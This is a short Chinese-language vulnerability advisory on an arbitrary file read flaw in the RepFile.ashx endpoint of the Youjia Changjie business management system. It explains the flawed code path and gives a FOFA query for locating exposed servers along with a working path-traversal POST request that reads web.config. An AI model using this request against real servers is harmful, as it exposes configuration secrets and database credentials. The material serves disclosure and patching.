漏洞简介
友加畅捷管理系统是一款专为小微商贸流通企业设计的财务业务一体化管理软件,涵盖进销存、财务、分销及移动管理等多个模块,旨在帮助企业实现高效的业务运营和财务核算。
该系统的 RepFile.ashx 接口存在任意文件读取漏洞。攻击者可利用此漏洞,未经授权地读取服务器上的任意文件,包括但不限于系统配置文件和数据库配置文件等敏感信息。 成功利用此漏洞可能导致企业内部敏感数据泄露,对系统的机密性和完整性构成潜在威胁。
影响版本
18.8000.1083.1000
fofa语法
icon_hash="2049187099" || fid="zzt8lL7SUwIIZQXZY6rTSw=="
漏洞分析
直接查看 /ReportDesign/RepFile.ashx 代码执行逻辑

根据参数Type 进入不同的处理逻辑,当Type=ReadReportCpfFile 时,看下它的实现逻辑

RepFile参数直接被拼接进系统Report目录下,然后使用xmlDoc.Load() 加载文件后将其内容直接在响应里回显xmlDoc.Load() 加载后的文件内容。但是xmlDoc.Load() 只能解析XML文件,不能读取其他文件,因此这个文件读取漏洞利用有限。
漏洞复现
POST /ReportDesign/RepFile.ashx HTTP/1.1
Host: youjiasoft.mrxn.net
Content-Type: application/x-www-form-urlencoded
RepFile=..%2fweb.config&Type=ReadReportCpfFile

成功读取到 web.config 文件内容。